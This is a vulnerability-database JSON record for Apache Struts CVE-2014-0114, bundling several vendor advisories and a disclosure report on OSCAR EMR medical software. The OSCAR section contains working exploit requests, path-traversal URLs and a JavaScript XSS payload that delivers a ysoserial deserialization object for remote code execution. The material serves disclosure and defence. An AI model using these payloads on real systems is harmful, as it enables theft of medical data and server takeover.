mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb\nHUtc9GTxbEwte2/fTU7bJ5M=\n=5Ewj\n-----END PGP SIGNATURE-----\n. Title: Multiple vulnerabilities in OSCAR EMR\nProduct: OSCAR EMR\nVendor: Oscar McMaster\nTested version: 15.21beta361\nRemediation status: Unknown\nReported by: Brian D. Hysell\n\n-----\n\nProduct Description:\n\n\"OSCAR is open-source Electronic Medical Record (EMR) software that\nwas first developed at McMaster University by Dr. David Chan. It is\ncontinuously enriched by contributions from OSCAR users and the\nCharter OSCAR Service Providers that support them. OSCAR has been\ncertified by OntarioMD, and verified as IHE compliant, achievements\nmade possible by the creation and success of OSCAR EMRas ISO\n13485:2003 certified Quality Management System.\"\n\n-----\n\nTimeline:\n\n29 Mar 2016 - Vendor contacted\n29 Mar 2016 - Vendor responded\n29 Apr 2016 - Vendor contacted for permission to share redacted report\nwith third party\n02 May 2016 - Vendor responded\n17 Jan 2017 - Lead developer contacted (no response)\n01 Jul 2018 - Vendor and lead developer contacted for follow-up,\ninformed of intended 15 Aug disclosure (no response)\n12 Aug 2018 - Alternate email address attempted for lead developer (no response)\n15 Aug 2018 - Vulnerabilities publicly disclosed\n\n-----\n\nContents:\n\nThis report uses OVE identifiers: http://www.openwall.com/ove/\n\nOVE-20160329-0001: Database backup disclosure or denial of service via\ninsecure dependency\nOVE-20160329-0003: Remote code execution via unsafe object deserialization\nOVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in\nsecurity report interface\nOVE-20160329-0007: SQL injection\nOVE-20160329-0008: Path traversal\nOVE-20160329-0002: Insecure direct object reference in document manager\nOVE-20160329-0005: Denial of service via resource exhaustion\nOVE-20160329-0006: Insecure password storage\nOVE-20160329-0009: Cross-site request forgery\n\n-----\n\nIssue details:\n\n=== OVE-20160329-0001: Database backup disclosure or denial of service\nvia insecure dependency ===\n\nOSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to\nCVE-2014-0114. \n\nAn authenticated user can issue the following request with different /\nomitted cookie headers:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster\n\nConsequently, he or she can access (using a valid session cookie),\ne.g., /oscar/OscarBackup.sql.gz\n\nAn unauthenticated attacker is prevented from doing likewise by the\naLoginFiltera servlet filter, but can still carry out a\ndenial-of-service attack impeding any access to the application until\nTomcat is restarted by issuing a request like the following:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid\n\n=== OVE-20160329-0003: Remote code execution via unsafe object\ndeserialization ===\n\nTraceabilityReportProcessor deserializes user-provided data, allowing\nremote code execution given the presence of known-vulnerable libraries\nin the classpath such as ROME 1.0. This functionality is only\navailable to administrators but can be exploited via XSS\n(OVE-20160329-0004) or CSRF (issue 9) using a payload generated with\nysoserial. \n\nIn the tested configuration PMmodule/GenericIntake/ImportForm.jsp is\ninaccessible due to the following exception\naorg.springframework.beans.factory.NoSuchBeanDefinitionException: No\nbean named \u0027oscarSecurityManager\u0027 is defineda, but were it to be\naccessible, it would be vulnerable as well. \n\n=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability\nin security report interface ===\n\nlogReport.jsp, in general, does not escape data it outputs to the\npage; in particular, on line 283, prop.getProperty(\"contentId\") is\nprinted unescaped. As a result, if an attacker includes Javascript in\nhis or her username during a login attempt, it will be executed if an\nadministrator views the Security Log Report for that timeframe. The\ntext printed in the \"Keyword\" column is cut off at 80 characters, but\nthat is more than enough to load an externally-hosted script, such as\nthe following script exploiting the deserialization RCE\nOVE-20160329-0003:\n\nvar decodedBase64 =\natob(\"H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA==\");\nvar binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length));\nfor(var i = 0; i \u003c binaryArray.length; i++) {\n binaryArray[i] = decodedBase64.charCodeAt(i);\n}\nvar payload = new Blob([binaryArray], {type: \"application/x-gzip\"});\nvar formData = new FormData();\nformData.append(\"file\", payload);\nformData.append(\"submit\", \"Generate\");\nvar xhr = new XMLHttpRequest();\nxhr.open(\"POST\", \"/oscar/admin/GenerateTraceabilityReportAction.do\");\nxhr.send(formData);\n\nXSS was not a focus of this test; other confirmed or likely XSS\nvulnerabilities are:\n* Reflected XSS through the errormsg parameter in loginfailed.jsp\n* Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp\n* Reflected XSS through the noteId parameter, line 1562 in\nCaseManagementViewAction (untested)\n* Reflected XSS through the pdfName parameter when an exception has\nbeen thrown, line 1174 in ManageDocumentAction (untested)\n* Reflected XSS through the pharmaName and pharmaFax parameters, line\n149 in FrmCustomedPDFServlet (untested)\n* Reflected XSS through the id and followupValue parameters, line 81\nin EctAddShortMeasurementAction (untested)\n\n=== OVE-20160329-0007: SQL injection ===\n\nOn line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is\nconcatenated into an SQL statement rather than parameterized; likewise\nthe content parameter on lines 217, 223, and 229 of\nadmin/logReport.jsp. In both cases these errors result in error-based\nSQL injection vulnerabilities; the former allows authenticated users\nwith access to oscarMDS/PatientSearch.jsp to access information beyond\ntheir privilege levels while the latter is accessible only to\nadministrators. \n\n=== OVE-20160329-0008: Path traversal ===\n\nImportLogDownloadAction reads and outputs an arbitrary absolute file\npath provided by the user; DelImageAction deletes a user-specified\nfilename without accounting for the possibility of relative path\ntraversal (i.e., the inclusion of \"../\" in the filename). \n\nAny authenticated user can exploit the former issue to steal files\nfrom the system, e.g.,\n/oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz\n\nAn authenticated user with access to eforms can delete files writeable\nby the Tomcat user, e.g.,\n/oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp\n\n=== OVE-20160329-0002: Insecure direct object reference in document manager ===\n\nManageDocumentAction.display() does not check the permissions\nassociated with the requested document ID (doc_no) before providing it\nto the requesting user. Given\n/oscar/dms/ManageDocument.do?method=display\u0026doc_no=X\u0026providerNo=Y, a\nuser with access to the document management interface can view\narbitrary documents by incrementing or decrementing X, regardless of\nwhether they have been marked private. \n\n=== OVE-20160329-0005: Denial of service via resource exhaustion ===\n\nuploadSignature.jsp, which is accessible to and operable by\nunauthenticated users, saves uploaded files to a temporary directory\nbut never deletes them. An attacker can upload many junk files and\neventually consume all disk space available to the /tmp directory,\nimpeding access to the application depending on the functionality in\nquestion and the partition layout of the host system (the effects are\ncrippling and pervasive if /tmp is on the same partition as /; they\nare much less so if /tmp is on a separate partition). \n\n=== OVE-20160329-0006: Insecure password storage ===\n\nPasswords are stored as SHA-1 hashes; unless unusually complex,\npasswords stored in that manner are typically easily recoverable with\na tool such as oclHashcat. In OSCAR each hash is stored as a string of\ndecimal numbers, rather than hexadecimal or raw bytes. This somewhat\nnon-traditional representation adds a bit of programming work to the\ncracking process, but does not represent a major impediment to attack. \n\n=== OVE-20160329-0009: Cross-site request forgery ===\n\nThe application lacks protection against cross-site request forgery\nattacks. A CSRF attack could be used against an administrator to\nexploit the deserialization RCE in a manner similar to the example\nprovided with OVE-20160329-0004. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: struts security update\nAdvisory ID: RHSA-2014:0474-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-0474.html\nIssue date: 2014-05-07\nCVE Names: CVE-2014-0114 \n=====================================================================\n\n1. Summary:\n\nUpdated struts packages that fix one security issue are now available for\nRed Hat Enterprise Linux 5. \n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from the\nCVE link in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL Desktop Workstation (v. 5 client) - i386, x86_64\nRed Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64\n\n3. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. All running applications\nusing struts must be restarted for this update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters\n\n6. Package List:\n\nRHEL Desktop Workstation (v. 5 client):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm\n\ni386:\nstruts-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm\n\nx86_64:\nstruts-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm\n\ni386:\nstruts-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm\n\nia64:\nstruts-1.2.9-4jpp.8.el5_10.ia64.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.ia64.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.ia64.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.ia64.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ia64.rpm\n\nppc:\nstruts-1.2.9-4jpp.8.el5_10.ppc.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.ppc.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.ppc.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.ppc.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ppc.rpm\n\ns390x:\nstruts-1.2.9-4jpp.8.el5_10.s390x.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.s390x.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.s390x.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.s390x.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.s390x.rpm\n\nx86_64:\nstruts-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-0114.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTacDGXlSAg2UNWIIRAhvbAJ0Za5jRat54AcgbIdHKlzbZN1y1hACcC8DR\nHJqJt2S278nXdfwLyGc7EJQ=\n=qMuX\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-09\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Commons-BeanUtils: Arbitrary code execution\n Date: July 20, 2016\n Bugs: #534498\n ID: 201607-09\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nApache Commons BeanUtils does not properly suppress the class property,\nwhich could lead to the remote execution of arbitrary code. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Commons BeanUtils users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/commons-beanutils-1.9.2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-0114\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-09\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. Description:\n\nAMQ Broker is a high-performance messaging implementation based on ActiveMQ\nArtemis. It uses an asynchronous journal for fast message persistence, and\nsupports multiple languages, protocols, and platforms. For further information, refer to the release notes linked to\nin the References section. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04311273\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04311273\nVersion: 1\n\nHPSBGN03041 rev.1 - HP IceWall Configuration Manager running Apache Struts,\nRemote Execution of Arbitrary Code\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-05-26\nLast Updated: 2014-05-26\n\nPotential Security Impact: Remote execution of arbitrary code\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP IceWall\nConfiguration Manager running Apache Struts. \n\nReferences: CVE-2014-0114, SSRT101566\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP IceWall Configuration Manager 3.0 running Apache Struts 1\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-0114 (AV:N/AC:L/Au:S/C:P/I:P/A:P) 6.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided mitigation information to protect against potential risk to\nHP IceWall Configuration Manager running Apache Struts. \n\nMitigation information for the Apache Struts vulnerability (CVE-2014-0114) is\navailable at the following location:\n\nhttp://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-a\npplications/ba-p/6463188#.U2J7xeaSxro\n\nJapanese information is available at the following location:\n\nhttp://www.hp.com/jp/icewall_patchaccess\n\nNote: The HP IceWall product is only available in Japan. \n\nHISTORY\nVersion:1 (rev.1) - 26 May 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0114"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
},
{
"db": "BID",
"id": "67121"
},
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "PACKETSTORM",
"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "126525"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "PACKETSTORM",
"id": "154792"
},
{
"db": "PACKETSTORM",
"id": "126811"
}
],
"trust": 3.24
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41690",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2014-0114",
"trust": 4.2
},
{
"db": "BID",
"id": "67121",
"trust": 1.9
},
{
"db": "JVN",
"id": "JVN30962312",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "59118",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59480",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59246",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "60177",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59479",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "58710",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59718",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59430",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59464",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "58851",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59228",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59704",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59014",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "57477",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59245",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "58947",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "60703",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/07/08/1",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/06/15/10",
"trust": 1.6
},
{
"db": "ICS CERT",
"id": "ICSMA-20-184-01",
"trust": 1.4
},
{
"db": "HITACHI",
"id": "HS14-018",
"trust": 0.9
},
{
"db": "HITACHI",
"id": "HS14-020",
"trust": 0.9
},
{
"db": "JUNIPER",
"id": "JSA10643",
"trust": 0.9
},
{
"db": "JVN",
"id": "JVNVU96290700",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002308",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056",
"trust": 0.8
},
{
"db": "CS-HELP",
"id": "SB2022072128",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1427",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.1089",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3134",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.2355",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.0544",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.2568",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2293.2",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2014-0114",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126692",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149050",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126525",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "137980",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154792",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126811",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "BID",
"id": "67121"
},
{
"db": "PACKETSTORM",
"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "126525"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "PACKETSTORM",
"id": "154792"
},
{
"db": "PACKETSTORM",
"id": "126811"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"id": "VAR-201404-0288",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4253262875
},
"last_update_date": "2026-03-09T21:53:46.914000Z",
"patch": {
"_id": null,
"data": [
{
"title": "OpenClinic\u00a0GA",
"trust": 0.8,
"url": "https://sourceforge.net/projects/open-clinic/"
},
{
"title": "BEANUTILS-463",
"trust": 0.8,
"url": "https://issues.apache.org/jira/browse/BEANUTILS-463"
},
{
"title": "Commons BeanUtils Package Version 1.9.2 Release Notes",
"trust": 0.8,
"url": "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/RELEASE-NOTES.txt"
},
{
"title": "Impact of CVE-2014-0094 / CVE-2014-0114",
"trust": 0.8,
"url": "http://software.fujitsu.com/jp/security/vulnerabilities/cve2014-0094-0114.html"
},
{
"title": "Interstage Business Application Server, Interstage Application Server, Interstage Apworks, Interstage Studio, Interstage Application Framework Suite, Interstage Job Workload Server, Interstage Service Integrator: vulnerability in Struts (CVE-2014-0114)",
"trust": 0.8,
"url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/interstage_bas_201401.html"
},
{
"title": "Interstage Navigator Explorer Server: vulnerability in Struts (CVE-2014-0114)",
"trust": 0.8,
"url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/interstage_nes201401.html"
},
{
"title": "HS14-018",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS14-018/index.html"
},
{
"title": "HS14-020",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS14-020/index.html"
},
{
"title": "1676303",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676303"
},
{
"title": "1676375",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676375"
},
{
"title": "1676931",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676931"
},
{
"title": "1675523",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675523"
},
{
"title": "1678621",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678621"
},
{
"title": "1680848",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680848"
},
{
"title": "1680194",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680194"
},
{
"title": "NTT DATA Corporation website",
"trust": 0.8,
"url": "http://www.nttdata.com/global/en/news-center/others/2014/052300.html"
},
{
"title": "Text Form of Oracle Critical Patch Update - October 2014 Risk Matrices",
"trust": 0.8,
